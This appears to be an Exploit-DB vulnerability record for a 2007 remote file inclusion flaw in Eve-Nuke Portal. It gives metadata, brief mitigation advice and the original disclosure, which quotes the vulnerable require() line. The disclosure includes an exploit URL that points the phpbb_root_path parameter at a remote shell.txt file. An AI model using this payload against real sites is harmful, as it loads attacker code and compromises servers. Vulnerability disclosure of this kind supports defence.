Eve-NukePortal file include (phpbb_root_path)

vendor:

Eve-Nuke Portal

by:

ThE TiGeR

7.5

CVSS

HIGH

File Inclusion

CWE

Product Name: Eve-Nuke Portal

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Eve-NukePortal file include (phpbb_root_path)

The vulnerability allows an attacker to include arbitrary files from the server by manipulating the 'phpbb_root_path' parameter in the URL.

Mitigation:

To mitigate this vulnerability, it is recommended to validate and sanitize user input before including files.

Source

Exploit-DB raw data:

#===========================================================================================
#Eve-NukePortal file include (phpbb_root_path)
#===========================================================================================
#
#Script name :Eve-Nuke Portal
#
#Download script : http://puzzle.dl.sourceforge.net/sourceforge/eve-nuke/en-forums-beta.zip
#
#===========================================================================================
#Vulnerable Code :
#
#require($phpbb_root_path . 'includes/functions_nuke.'.$phpEx);
#
#===========================================================================================
#Exploit :
#
#http://www.site.com/modules/EN-Forums/db/mysql.php?phpbb_root_path=http://www.site.com/shell.txt?
#
#===========================================================================================
#
#Discoverd By : ThE TiGeR
#
#Contact : miro_tiger100[at]hotmail[dot]com
#
#===========================================================================================

# milw0rm.com [2007-03-27]